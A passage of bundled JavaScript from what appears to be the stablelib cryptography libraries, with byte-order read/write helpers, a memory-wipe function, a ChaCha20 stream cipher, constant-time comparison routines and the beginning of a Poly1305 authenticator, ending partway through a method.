$ddd89ca0ca71c6d3$exports.writeInt16BE = $ddd89ca0ca71c6d3$var$writeUint16BE;
/**
 * Writes 2-byte little-endian representation of 16-bit unsigned
 * value to array starting at offset.
 *
 * If byte array is not given, creates a new 2-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint16LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(2);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 0;
    out[offset + 1] = value >>> 8;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint16LE = $ddd89ca0ca71c6d3$var$writeUint16LE;
$ddd89ca0ca71c6d3$exports.writeInt16LE = $ddd89ca0ca71c6d3$var$writeUint16LE;
/**
 * Reads 4 bytes from array starting at offset as big-endian
 * signed 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt32BE(array, offset) {
    if (offset === void 0) offset = 0;
    return array[offset] << 24 | array[offset + 1] << 16 | array[offset + 2] << 8 | array[offset + 3];
}
$ddd89ca0ca71c6d3$exports.readInt32BE = $ddd89ca0ca71c6d3$var$readInt32BE;
/**
 * Reads 4 bytes from array starting at offset as big-endian
 * unsigned 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint32BE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset] << 24 | array[offset + 1] << 16 | array[offset + 2] << 8 | array[offset + 3]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint32BE = $ddd89ca0ca71c6d3$var$readUint32BE;
/**
 * Reads 4 bytes from array starting at offset as little-endian
 * signed 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt32LE(array, offset) {
    if (offset === void 0) offset = 0;
    return array[offset + 3] << 24 | array[offset + 2] << 16 | array[offset + 1] << 8 | array[offset];
}
$ddd89ca0ca71c6d3$exports.readInt32LE = $ddd89ca0ca71c6d3$var$readInt32LE;
/**
 * Reads 4 bytes from array starting at offset as little-endian
 * unsigned 32-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint32LE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 3] << 24 | array[offset + 2] << 16 | array[offset + 1] << 8 | array[offset]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint32LE = $ddd89ca0ca71c6d3$var$readUint32LE;
/**
 * Writes 4-byte big-endian representation of 32-bit unsigned
 * value to byte array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint32BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 24;
    out[offset + 1] = value >>> 16;
    out[offset + 2] = value >>> 8;
    out[offset + 3] = value >>> 0;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint32BE = $ddd89ca0ca71c6d3$var$writeUint32BE;
$ddd89ca0ca71c6d3$exports.writeInt32BE = $ddd89ca0ca71c6d3$var$writeUint32BE;
/**
 * Writes 4-byte little-endian representation of 32-bit unsigned
 * value to array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint32LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 0;
    out[offset + 1] = value >>> 8;
    out[offset + 2] = value >>> 16;
    out[offset + 3] = value >>> 24;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint32LE = $ddd89ca0ca71c6d3$var$writeUint32LE;
$ddd89ca0ca71c6d3$exports.writeInt32LE = $ddd89ca0ca71c6d3$var$writeUint32LE;
/**
 * Reads 8 bytes from array starting at offset as big-endian
 * signed 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports exact
 * numbers in range -9007199254740991 to 9007199254740991.
 * If the number stored in the byte array is outside this range,
 * the result is not exact.
 */ function $ddd89ca0ca71c6d3$var$readInt64BE(array, offset) {
    if (offset === void 0) offset = 0;
    var hi = $ddd89ca0ca71c6d3$var$readInt32BE(array, offset);
    var lo = $ddd89ca0ca71c6d3$var$readInt32BE(array, offset + 4);
    return hi * 0x100000000 + lo - (lo >> 31) * 0x100000000;
}
$ddd89ca0ca71c6d3$exports.readInt64BE = $ddd89ca0ca71c6d3$var$readInt64BE;
/**
 * Reads 8 bytes from array starting at offset as big-endian
 * unsigned 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports values up to 2^53-1.
 */ function $ddd89ca0ca71c6d3$var$readUint64BE(array, offset) {
    if (offset === void 0) offset = 0;
    var hi = $ddd89ca0ca71c6d3$var$readUint32BE(array, offset);
    var lo = $ddd89ca0ca71c6d3$var$readUint32BE(array, offset + 4);
    return hi * 0x100000000 + lo;
}
$ddd89ca0ca71c6d3$exports.readUint64BE = $ddd89ca0ca71c6d3$var$readUint64BE;
/**
 * Reads 8 bytes from array starting at offset as little-endian
 * signed 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports exact
 * numbers in range -9007199254740991 to 9007199254740991.
 * If the number stored in the byte array is outside this range,
 * the result is not exact.
 */ function $ddd89ca0ca71c6d3$var$readInt64LE(array, offset) {
    if (offset === void 0) offset = 0;
    var lo = $ddd89ca0ca71c6d3$var$readInt32LE(array, offset);
    var hi = $ddd89ca0ca71c6d3$var$readInt32LE(array, offset + 4);
    return hi * 0x100000000 + lo - (lo >> 31) * 0x100000000;
}
$ddd89ca0ca71c6d3$exports.readInt64LE = $ddd89ca0ca71c6d3$var$readInt64LE;
/**
 * Reads 8 bytes from array starting at offset as little-endian
 * unsigned 64-bit integer and returns it.
 *
 * IMPORTANT: due to JavaScript limitation, supports values up to 2^53-1.
 */ function $ddd89ca0ca71c6d3$var$readUint64LE(array, offset) {
    if (offset === void 0) offset = 0;
    var lo = $ddd89ca0ca71c6d3$var$readUint32LE(array, offset);
    var hi = $ddd89ca0ca71c6d3$var$readUint32LE(array, offset + 4);
    return hi * 0x100000000 + lo;
}
$ddd89ca0ca71c6d3$exports.readUint64LE = $ddd89ca0ca71c6d3$var$readUint64LE;
/**
 * Writes 8-byte big-endian representation of 64-bit unsigned
 * value to byte array starting at offset.
 *
 * Due to JavaScript limitation, supports values up to 2^53-1.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint64BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    $ddd89ca0ca71c6d3$var$writeUint32BE(value / 0x100000000 >>> 0, out, offset);
    $ddd89ca0ca71c6d3$var$writeUint32BE(value >>> 0, out, offset + 4);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint64BE = $ddd89ca0ca71c6d3$var$writeUint64BE;
$ddd89ca0ca71c6d3$exports.writeInt64BE = $ddd89ca0ca71c6d3$var$writeUint64BE;
/**
 * Writes 8-byte little-endian representation of 64-bit unsigned
 * value to byte array starting at offset.
 *
 * Due to JavaScript limitation, supports values up to 2^53-1.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint64LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    $ddd89ca0ca71c6d3$var$writeUint32LE(value >>> 0, out, offset);
    $ddd89ca0ca71c6d3$var$writeUint32LE(value / 0x100000000 >>> 0, out, offset + 4);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint64LE = $ddd89ca0ca71c6d3$var$writeUint64LE;
$ddd89ca0ca71c6d3$exports.writeInt64LE = $ddd89ca0ca71c6d3$var$writeUint64LE;
/**
 * Reads bytes from array starting at offset as big-endian
 * unsigned bitLen-bit integer and returns it.
 *
 * Supports bit lengths divisible by 8, up to 48.
 */ function $ddd89ca0ca71c6d3$var$readUintBE(bitLength, array, offset) {
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("readUintBE supports only bitLengths divisible by 8");
    if (bitLength / 8 > array.length - offset) throw new Error("readUintBE: array is too short for the given bitLength");
    var result = 0;
    var mul = 1;
    for(var i = bitLength / 8 + offset - 1; i >= offset; i--){
        result += array[i] * mul;
        mul *= 256;
    }
    return result;
}
$ddd89ca0ca71c6d3$exports.readUintBE = $ddd89ca0ca71c6d3$var$readUintBE;
/**
 * Reads bytes from array starting at offset as little-endian
 * unsigned bitLen-bit integer and returns it.
 *
 * Supports bit lengths divisible by 8, up to 48.
 */ function $ddd89ca0ca71c6d3$var$readUintLE(bitLength, array, offset) {
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("readUintLE supports only bitLengths divisible by 8");
    if (bitLength / 8 > array.length - offset) throw new Error("readUintLE: array is too short for the given bitLength");
    var result = 0;
    var mul = 1;
    for(var i = offset; i < offset + bitLength / 8; i++){
        result += array[i] * mul;
        mul *= 256;
    }
    return result;
}
$ddd89ca0ca71c6d3$exports.readUintLE = $ddd89ca0ca71c6d3$var$readUintLE;
/**
 * Writes a big-endian representation of bitLen-bit unsigned
 * value to array starting at offset.
 *
 * Supports bit lengths divisible by 8, up to 48.
 *
 * If byte array is not given, creates a new one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUintBE(bitLength, value, out, offset) {
    if (out === void 0) out = new Uint8Array(bitLength / 8);
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("writeUintBE supports only bitLengths divisible by 8");
    if (!$51a3ca76628cc201$exports.isSafeInteger(value)) throw new Error("writeUintBE value must be an integer");
    var div = 1;
    for(var i = bitLength / 8 + offset - 1; i >= offset; i--){
        out[i] = value / div & 0xff;
        div *= 256;
    }
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUintBE = $ddd89ca0ca71c6d3$var$writeUintBE;
/**
 * Writes a little-endian representation of bitLen-bit unsigned
 * value to array starting at offset.
 *
 * Supports bit lengths divisible by 8, up to 48.
 *
 * If byte array is not given, creates a new one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUintLE(bitLength, value, out, offset) {
    if (out === void 0) out = new Uint8Array(bitLength / 8);
    if (offset === void 0) offset = 0;
    // TODO(dchest): implement support for bitLengths non-divisible by 8
    if (bitLength % 8 !== 0) throw new Error("writeUintLE supports only bitLengths divisible by 8");
    if (!$51a3ca76628cc201$exports.isSafeInteger(value)) throw new Error("writeUintLE value must be an integer");
    var div = 1;
    for(var i = offset; i < offset + bitLength / 8; i++){
        out[i] = value / div & 0xff;
        div *= 256;
    }
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUintLE = $ddd89ca0ca71c6d3$var$writeUintLE;
/**
 * Reads 4 bytes from array starting at offset as big-endian
 * 32-bit floating-point number and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat32BE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat32(offset);
}
$ddd89ca0ca71c6d3$exports.readFloat32BE = $ddd89ca0ca71c6d3$var$readFloat32BE;
/**
 * Reads 4 bytes from array starting at offset as little-endian
 * 32-bit floating-point number and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat32LE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat32(offset, true);
}
$ddd89ca0ca71c6d3$exports.readFloat32LE = $ddd89ca0ca71c6d3$var$readFloat32LE;
/**
 * Reads 8 bytes from array starting at offset as big-endian
 * 64-bit floating-point number ("double") and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat64BE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat64(offset);
}
$ddd89ca0ca71c6d3$exports.readFloat64BE = $ddd89ca0ca71c6d3$var$readFloat64BE;
/**
 * Reads 8 bytes from array starting at offset as little-endian
 * 64-bit floating-point number ("double") and returns it.
 */ function $ddd89ca0ca71c6d3$var$readFloat64LE(array, offset) {
    if (offset === void 0) offset = 0;
    var view = new DataView(array.buffer, array.byteOffset, array.byteLength);
    return view.getFloat64(offset, true);
}
$ddd89ca0ca71c6d3$exports.readFloat64LE = $ddd89ca0ca71c6d3$var$readFloat64LE;
/**
 * Writes 4-byte big-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat32BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat32(offset, value);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat32BE = $ddd89ca0ca71c6d3$var$writeFloat32BE;
/**
 * Writes 4-byte little-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 4-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat32LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(4);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat32(offset, value, true);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat32LE = $ddd89ca0ca71c6d3$var$writeFloat32LE;
/**
 * Writes 8-byte big-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat64BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat64(offset, value);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat64BE = $ddd89ca0ca71c6d3$var$writeFloat64BE;
/**
 * Writes 8-byte little-endian floating-point representation of value
 * to byte array starting at offset.
 *
 * If byte array is not given, creates a new 8-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeFloat64LE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(8);
    if (offset === void 0) offset = 0;
    var view = new DataView(out.buffer, out.byteOffset, out.byteLength);
    view.setFloat64(offset, value, true);
    return out;
}
$ddd89ca0ca71c6d3$exports.writeFloat64LE = $ddd89ca0ca71c6d3$var$writeFloat64LE;


var $276678191c4bdb56$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($276678191c4bdb56$exports, "__esModule", {
    value: true
});
/**
 * Sets all values in the given array to zero and returns it.
 *
 * The fact that it sets bytes to zero can be relied on.
 *
 * There is no guarantee that this function makes data disappear from memory,
 * as runtime implementation can, for example, have copying garbage collector
 * that will make copies of sensitive data before we wipe it. Or that an
 * operating system will write our data to swap or sleep image. Another thing
 * is that an optimizing compiler can remove calls to this function or make it
 * no-op. There's nothing we can do with it, so we just do our best and hope
 * that everything will be okay and good will triumph over evil.
 */ function $276678191c4bdb56$var$wipe(array) {
    // Right now it's similar to array.fill(0). If it turns
    // out that runtimes optimize this call away, maybe
    // we can try something else.
    for(var i = 0; i < array.length; i++)array[i] = 0;
    return array;
}
$276678191c4bdb56$exports.wipe = $276678191c4bdb56$var$wipe;


// Number of ChaCha rounds (ChaCha20).
var $3ca0635e21db662f$var$ROUNDS = 20;
// Applies the ChaCha core function to 16-byte input,
// 32-byte key key, and puts the result into 64-byte array out.
function $3ca0635e21db662f$var$core(out, input, key) {
    var j0 = 0x61707865; // "expa"  -- ChaCha's "sigma" constant
    var j1 = 0x3320646E; // "nd 3"     for 32-byte keys
    var j2 = 0x79622D32; // "2-by"
    var j3 = 0x6B206574; // "te k"
    var j4 = key[3] << 24 | key[2] << 16 | key[1] << 8 | key[0];
    var j5 = key[7] << 24 | key[6] << 16 | key[5] << 8 | key[4];
    var j6 = key[11] << 24 | key[10] << 16 | key[9] << 8 | key[8];
    var j7 = key[15] << 24 | key[14] << 16 | key[13] << 8 | key[12];
    var j8 = key[19] << 24 | key[18] << 16 | key[17] << 8 | key[16];
    var j9 = key[23] << 24 | key[22] << 16 | key[21] << 8 | key[20];
    var j10 = key[27] << 24 | key[26] << 16 | key[25] << 8 | key[24];
    var j11 = key[31] << 24 | key[30] << 16 | key[29] << 8 | key[28];
    var j12 = input[3] << 24 | input[2] << 16 | input[1] << 8 | input[0];
    var j13 = input[7] << 24 | input[6] << 16 | input[5] << 8 | input[4];
    var j14 = input[11] << 24 | input[10] << 16 | input[9] << 8 | input[8];
    var j15 = input[15] << 24 | input[14] << 16 | input[13] << 8 | input[12];
    var x0 = j0;
    var x1 = j1;
    var x2 = j2;
    var x3 = j3;
    var x4 = j4;
    var x5 = j5;
    var x6 = j6;
    var x7 = j7;
    var x8 = j8;
    var x9 = j9;
    var x10 = j10;
    var x11 = j11;
    var x12 = j12;
    var x13 = j13;
    var x14 = j14;
    var x15 = j15;
    for(var i = 0; i < $3ca0635e21db662f$var$ROUNDS; i += 2){
        x0 = x0 + x4 | 0;
        x12 ^= x0;
        x12 = x12 >>> 16 | x12 << 16;
        x8 = x8 + x12 | 0;
        x4 ^= x8;
        x4 = x4 >>> 20 | x4 << 12;
        x1 = x1 + x5 | 0;
        x13 ^= x1;
        x13 = x13 >>> 16 | x13 << 16;
        x9 = x9 + x13 | 0;
        x5 ^= x9;
        x5 = x5 >>> 20 | x5 << 12;
        x2 = x2 + x6 | 0;
        x14 ^= x2;
        x14 = x14 >>> 16 | x14 << 16;
        x10 = x10 + x14 | 0;
        x6 ^= x10;
        x6 = x6 >>> 20 | x6 << 12;
        x3 = x3 + x7 | 0;
        x15 ^= x3;
        x15 = x15 >>> 16 | x15 << 16;
        x11 = x11 + x15 | 0;
        x7 ^= x11;
        x7 = x7 >>> 20 | x7 << 12;
        x2 = x2 + x6 | 0;
        x14 ^= x2;
        x14 = x14 >>> 24 | x14 << 8;
        x10 = x10 + x14 | 0;
        x6 ^= x10;
        x6 = x6 >>> 25 | x6 << 7;
        x3 = x3 + x7 | 0;
        x15 ^= x3;
        x15 = x15 >>> 24 | x15 << 8;
        x11 = x11 + x15 | 0;
        x7 ^= x11;
        x7 = x7 >>> 25 | x7 << 7;
        x1 = x1 + x5 | 0;
        x13 ^= x1;
        x13 = x13 >>> 24 | x13 << 8;
        x9 = x9 + x13 | 0;
        x5 ^= x9;
        x5 = x5 >>> 25 | x5 << 7;
        x0 = x0 + x4 | 0;
        x12 ^= x0;
        x12 = x12 >>> 24 | x12 << 8;
        x8 = x8 + x12 | 0;
        x4 ^= x8;
        x4 = x4 >>> 25 | x4 << 7;
        x0 = x0 + x5 | 0;
        x15 ^= x0;
        x15 = x15 >>> 16 | x15 << 16;
        x10 = x10 + x15 | 0;
        x5 ^= x10;
        x5 = x5 >>> 20 | x5 << 12;
        x1 = x1 + x6 | 0;
        x12 ^= x1;
        x12 = x12 >>> 16 | x12 << 16;
        x11 = x11 + x12 | 0;
        x6 ^= x11;
        x6 = x6 >>> 20 | x6 << 12;
        x2 = x2 + x7 | 0;
        x13 ^= x2;
        x13 = x13 >>> 16 | x13 << 16;
        x8 = x8 + x13 | 0;
        x7 ^= x8;
        x7 = x7 >>> 20 | x7 << 12;
        x3 = x3 + x4 | 0;
        x14 ^= x3;
        x14 = x14 >>> 16 | x14 << 16;
        x9 = x9 + x14 | 0;
        x4 ^= x9;
        x4 = x4 >>> 20 | x4 << 12;
        x2 = x2 + x7 | 0;
        x13 ^= x2;
        x13 = x13 >>> 24 | x13 << 8;
        x8 = x8 + x13 | 0;
        x7 ^= x8;
        x7 = x7 >>> 25 | x7 << 7;
        x3 = x3 + x4 | 0;
        x14 ^= x3;
        x14 = x14 >>> 24 | x14 << 8;
        x9 = x9 + x14 | 0;
        x4 ^= x9;
        x4 = x4 >>> 25 | x4 << 7;
        x1 = x1 + x6 | 0;
        x12 ^= x1;
        x12 = x12 >>> 24 | x12 << 8;
        x11 = x11 + x12 | 0;
        x6 ^= x11;
        x6 = x6 >>> 25 | x6 << 7;
        x0 = x0 + x5 | 0;
        x15 ^= x0;
        x15 = x15 >>> 24 | x15 << 8;
        x10 = x10 + x15 | 0;
        x5 ^= x10;
        x5 = x5 >>> 25 | x5 << 7;
    }
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x0 + j0 | 0, out, 0);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x1 + j1 | 0, out, 4);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x2 + j2 | 0, out, 8);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x3 + j3 | 0, out, 12);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x4 + j4 | 0, out, 16);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x5 + j5 | 0, out, 20);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x6 + j6 | 0, out, 24);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x7 + j7 | 0, out, 28);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x8 + j8 | 0, out, 32);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x9 + j9 | 0, out, 36);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x10 + j10 | 0, out, 40);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x11 + j11 | 0, out, 44);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x12 + j12 | 0, out, 48);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x13 + j13 | 0, out, 52);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x14 + j14 | 0, out, 56);
    $ddd89ca0ca71c6d3$exports.writeUint32LE(x15 + j15 | 0, out, 60);
}
/**
 * Encrypt src with ChaCha20 stream generated for the given 32-byte key and
 * 8-byte (as in original implementation) or 12-byte (as in RFC7539) nonce and
 * write the result into dst and return it.
 *
 * dst and src may be the same, but otherwise must not overlap.
 *
 * If nonce is 12 bytes, users should not encrypt more than 256 GiB with the
 * same key and nonce, otherwise the stream will repeat. The function will
 * throw error if counter overflows to prevent this.
 *
 * If nonce is 8 bytes, the output is practically unlimited (2^70 bytes, which
 * is more than a million petabytes). However, it is not recommended to
 * generate 8-byte nonces randomly, as the chance of collision is high.
 *
 * Never use the same key and nonce to encrypt more than one message.
 *
 * If nonceInplaceCounterLength is not 0, the nonce is assumed to be a 16-byte
 * array with stream counter in first nonceInplaceCounterLength bytes and nonce
 * in the last remaining bytes. The counter will be incremented inplace for
 * each ChaCha block. This is useful if you need to encrypt one stream of data
 * in chunks.
 */ function $3ca0635e21db662f$var$streamXOR(key, nonce, src, dst, nonceInplaceCounterLength) {
    if (nonceInplaceCounterLength === void 0) nonceInplaceCounterLength = 0;
    // We only support 256-bit keys.
    if (key.length !== 32) throw new Error("ChaCha: key size must be 32 bytes");
    if (dst.length < src.length) throw new Error("ChaCha: destination is shorter than source");
    var nc;
    var counterLength;
    if (nonceInplaceCounterLength === 0) {
        if (nonce.length !== 8 && nonce.length !== 12) throw new Error("ChaCha nonce must be 8 or 12 bytes");
        nc = new Uint8Array(16);
        // First counterLength bytes of nc are counter, starting with zero.
        counterLength = nc.length - nonce.length;
        // Last bytes of nc after counterLength are nonce, set them.
        nc.set(nonce, counterLength);
    } else {
        if (nonce.length !== 16) throw new Error("ChaCha nonce with counter must be 16 bytes");
        // This will update passed nonce with counter inplace.
        nc = nonce;
        counterLength = nonceInplaceCounterLength;
    }
    // Allocate temporary space for ChaCha block.
    var block = new Uint8Array(64);
    for(var i = 0; i < src.length; i += 64){
        // Generate a block.
        $3ca0635e21db662f$var$core(block, nc, key);
        // XOR block bytes with src into dst.
        for(var j = i; j < i + 64 && j < src.length; j++)dst[j] = src[j] ^ block[j - i];
        // Increment counter.
        $3ca0635e21db662f$var$incrementCounter(nc, 0, counterLength);
    }
    // Cleanup temporary space.
    $276678191c4bdb56$exports.wipe(block);
    if (nonceInplaceCounterLength === 0) // Cleanup counter.
    $276678191c4bdb56$exports.wipe(nc);
    return dst;
}
$3ca0635e21db662f$exports.streamXOR = $3ca0635e21db662f$var$streamXOR;
/**
 * Generate ChaCha20 stream for the given 32-byte key and 8-byte or 12-byte
 * nonce and write it into dst and return it.
 *
 * Never use the same key and nonce to generate more than one stream.
 *
 * If nonceInplaceCounterLength is not 0, it behaves the same with respect to
 * the nonce as described in the streamXOR documentation.
 *
 * stream is like streamXOR with all-zero src.
 */ function $3ca0635e21db662f$var$stream(key, nonce, dst, nonceInplaceCounterLength) {
    if (nonceInplaceCounterLength === void 0) nonceInplaceCounterLength = 0;
    $276678191c4bdb56$exports.wipe(dst);
    return $3ca0635e21db662f$var$streamXOR(key, nonce, dst, dst, nonceInplaceCounterLength);
}
$3ca0635e21db662f$exports.stream = $3ca0635e21db662f$var$stream;
function $3ca0635e21db662f$var$incrementCounter(counter, pos, len) {
    var carry = 1;
    while(len--){
        carry = carry + (counter[pos] & 0xff) | 0;
        counter[pos] = carry & 0xff;
        carry >>>= 8;
        pos++;
    }
    if (carry > 0) throw new Error("ChaCha: counter overflow");
}


var $bc2eb21e5dd3f530$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($bc2eb21e5dd3f530$exports, "__esModule", {
    value: true
});
var $0806512cf7f87b87$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($0806512cf7f87b87$exports, "__esModule", {
    value: true
});
/**
 * Package constant-time provides functions for performing algorithmically constant-time operations.
 */ /**
 * NOTE! Due to the inability to guarantee real constant time evaluation of
 * anything in JavaScript VM, this is module is the best effort.
 */ /**
 * Returns resultIfOne if subject is 1, or resultIfZero if subject is 0.
 *
 * Supports only 32-bit integers, so resultIfOne or resultIfZero are not
 * integers, they'll be converted to them with bitwise operations.
 */ function $0806512cf7f87b87$var$select(subject, resultIfOne, resultIfZero) {
    return ~(subject - 1) & resultIfOne | subject - 1 & resultIfZero;
}
$0806512cf7f87b87$exports.select = $0806512cf7f87b87$var$select;
/**
 * Returns 1 if a <= b, or 0 if not.
 * Arguments must be positive 32-bit integers less than or equal to 2^31 - 1.
 */ function $0806512cf7f87b87$var$lessOrEqual(a, b) {
    return (a | 0) - (b | 0) - 1 >>> 31 & 1;
}
$0806512cf7f87b87$exports.lessOrEqual = $0806512cf7f87b87$var$lessOrEqual;
/**
 * Returns 1 if a and b are of equal length and their contents
 * are equal, or 0 otherwise.
 *
 * Note that unlike in equal(), zero-length inputs are considered
 * the same, so this function will return 1.
 */ function $0806512cf7f87b87$var$compare(a, b) {
    if (a.length !== b.length) return 0;
    var result = 0;
    for(var i = 0; i < a.length; i++)result |= a[i] ^ b[i];
    return 1 & result - 1 >>> 8;
}
$0806512cf7f87b87$exports.compare = $0806512cf7f87b87$var$compare;
/**
 * Returns true if a and b are of equal non-zero length,
 * and their contents are equal, or false otherwise.
 *
 * Note that unlike in compare() zero-length inputs are considered
 * _not_ equal, so this function will return false.
 */ function $0806512cf7f87b87$var$equal(a, b) {
    if (a.length === 0 || b.length === 0) return false;
    return $0806512cf7f87b87$var$compare(a, b) !== 0;
}
$0806512cf7f87b87$exports.equal = $0806512cf7f87b87$var$equal;



$bc2eb21e5dd3f530$exports.DIGEST_LENGTH = 16;
// Port of Andrew Moon's Poly1305-donna-16. Public domain.
// https://github.com/floodyberry/poly1305-donna
/**
 * Poly1305 computes 16-byte authenticator of message using
 * a one-time 32-byte key.
 *
 * Important: key should be used for only one message,
 * it should never repeat.
 */ var $bc2eb21e5dd3f530$var$Poly1305 = /** @class */ function() {
    function Poly1305(key) {
        this.digestLength = $bc2eb21e5dd3f530$exports.DIGEST_LENGTH;
        this._buffer = new Uint8Array(16);
        this._r = new Uint16Array(10);
        this._h = new Uint16Array(10);
        this._pad = new Uint16Array(8);
        this._leftover = 0;
        this._fin = 0;
        this._finished = false;
        var t0 = key[0] | key[1] << 8;
        this._r[0] = t0 & 0x1fff;
        var t1 = key[2] | key[3] << 8;
        this._r[1] = (t0 >>> 13 | t1 << 3) & 0x1fff;
        var t2 = key[4] | key[5] << 8;
        this._r[2] = (t1 >>> 10 | t2 << 6) & 0x1f03;
        var t3 = key[6] | key[7] << 8;
        this._r[3] = (t2 >>> 7 | t3 << 9) & 0x1fff;
        var t4 = key[8] | key[9] << 8;
        this._r[4] = (t3 >>> 4 | t4 << 12) & 0x00ff;
        this._r[5] = t4 >>> 1 & 0x1ffe;
        var t5 = key[10] | key[11] << 8;
        this._r[6] = (t4 >>> 14 | t5 << 2) & 0x1fff;
        var t6 = key[12] | key[13] << 8;
        this._r[7] = (t5 >>> 11 | t6 << 5) & 0x1f81;
        var t7 = key[14] | key[15] << 8;
        this._r[8] = (t6 >>> 8 | t7 << 8) & 0x1fff;
        this._r[9] = t7 >>> 5 & 0x007f;
        this._pad[0] = key[16] | key[17] << 8;
        this._pad[1] = key[18] | key[19] << 8;
        this._pad[2] = key[20] | key[21] << 8;
        this._pad[3] = key[22] | key[23] << 8;
        this._pad[4] = key[24] | key[25] << 8;
        this._pad[5] = key[26] | key[27] << 8;
        this._pad[6] = key[28] | key[29] << 8;
        this._pad[7] = key[30] | key[31] << 8;
    }
    Poly1305.prototype._blocks = function(m, mpos, bytes) {
        var hibit = this._fin ? 0 : 2048;
